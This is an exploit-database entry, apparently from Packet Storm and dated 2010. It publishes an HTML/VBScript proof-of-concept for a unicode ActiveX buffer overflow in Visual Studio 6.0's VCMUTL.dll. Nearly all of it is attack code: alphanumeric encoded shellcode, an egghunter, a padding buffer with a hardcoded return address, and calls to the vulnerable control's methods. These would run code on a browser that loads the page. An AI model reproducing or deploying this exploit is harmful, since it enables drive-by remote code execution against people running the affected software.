Microsoft Visual Studio 6.0 Buffer Overflow

2010-07-28T00:00:00
ID PACKETSTORM:92223
Type packetstorm
Reporter MadjiX
Modified 2010-07-28T00:00:00

Description

                                        
                                            `########################################################################################  
# _ #  
# .-----.--.--.--.----.----.-.---| | #  
# | _ | | | | | -__| _ | #  
# | __|________|__|__|_____|_____| #  
# |__| By MadjiX #  
# Sec4ever.com #  
########################################################################################  
#Title : Microsoft visual studio 6.0 (VCMUTL.dll) 0day unicode ActiveX Buffer overflow #  
#author : MadjiX <Dz8[]Hotmail{}com> #  
#Gr33tz : His0k4 , Bibi-info , Sud0 , corelancod3r , volc4n0 , mr_me , Shadow-Devil #  
########################################################################################  
  
Exploit:  
<html>  
<object classid='clsid:723AA6D1-3B50-11D1-9636-00600818410C' id='target'></object>  
<script language='vbscript'>  
  
shellcode = unescape("%u7a44%u3732%u7a44%u3732%u03eb%ueb59%ue805%ufff8%uffff") & _  
unescape("%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458") & _  
unescape("%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244") & _  
unescape("%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144") & _  
unescape("%u5856%u5a34%u4238%u4a44%u4d4f%u4f4e%u4e4a%u3446%u5042") & _  
unescape("%u5042%u5042%u384b%u3445%u534e%u584b%u374e%u3045%u574a") & _  
unescape("%u3041%u4e4f%u384b%u344f%u314a%u584b%u454f%u3242%u3041") & _  
unescape("%u4e4b%u3449%u584b%u3346%u484b%u3041%u4e50%u5341%u4c42") & _  
unescape("%u4949%u4a4e%u4846%u4c42%u5746%u3047%u4c41%u4c4c%u304d") & _  
unescape("%u3041%u4c44%u4e4b%u4f46%u434b%u5546%u3246%u3046%u5745") & _  
unescape("%u4e45%u584b%u454f%u3246%u5041%u4e4b%u3648%u584b%u304e") & _  
unescape("%u544b%u584b%u554f%u514e%u5041%u4e4b%u484b%u414e%u484b") & _  
unescape("%u3041%u4e4b%u5849%u454e%u5246%u5046%u4c43%u5341%u4c42") & _  
unescape("%u4646%u384b%u3442%u5342%u4845%u4c42%u574a%u304e%u484b") & _  
unescape("%u3442%u504e%u384b%u5742%u314e%u4a4d%u584b%u364a%u304a") & _  
unescape("%u4e4b%u5049%u484b%u5842%u4b42%u3042%u3042%u3042%u384b") & _  
unescape("%u464a%u334e%u454f%u5341%u4f48%u4642%u5548%u3849%u4f4a") & _  
unescape("%u4843%u4c42%u474b%u3542%u564a%u5750%u4d4a%u4e44%u3743") & _  
unescape("%u364a%u494a%u4f50%u384c%u5050%u4547%u4f4f%u4e47%u5643") & _  
unescape("%u4641%u364e%u5643%u5042%u5a5a")  
  
buffer1 = string(262, "A")  
ecx = unescape("%u0090%u0090")  
eip = unescape("%u048b%u0041") ' eip = unescape("%u048b%u0041") <--- (sp3 en) # eip = unescape("%u048b%u0041") <--- (sp3 fr)  
fill = string(4, "A")  
nop = string(600, "A")  
  
egg = egg + "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARA"  
egg = egg + "LAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQI"  
egg = egg + "AIQI111AIAJQYAZBABABABABkMAGB9u4JBaVRaxJYoLOm"  
egg = egg + "rpRbJKR0XvmLnmlKUNzSDhotxOTsJNRnWdKXzTo3EzJvO"  
egg = egg + "bUWwyoWwZjA"  
  
exploit = buffer1 + eip + fill + ecx + egg  
target.IsRegisterableDll shellcode  
target.IsRegisterableDll shellcode  
target.IsRegisterableDll shellcode  
target.RegisterApplication exploit  
</script>  
</html>  
  
`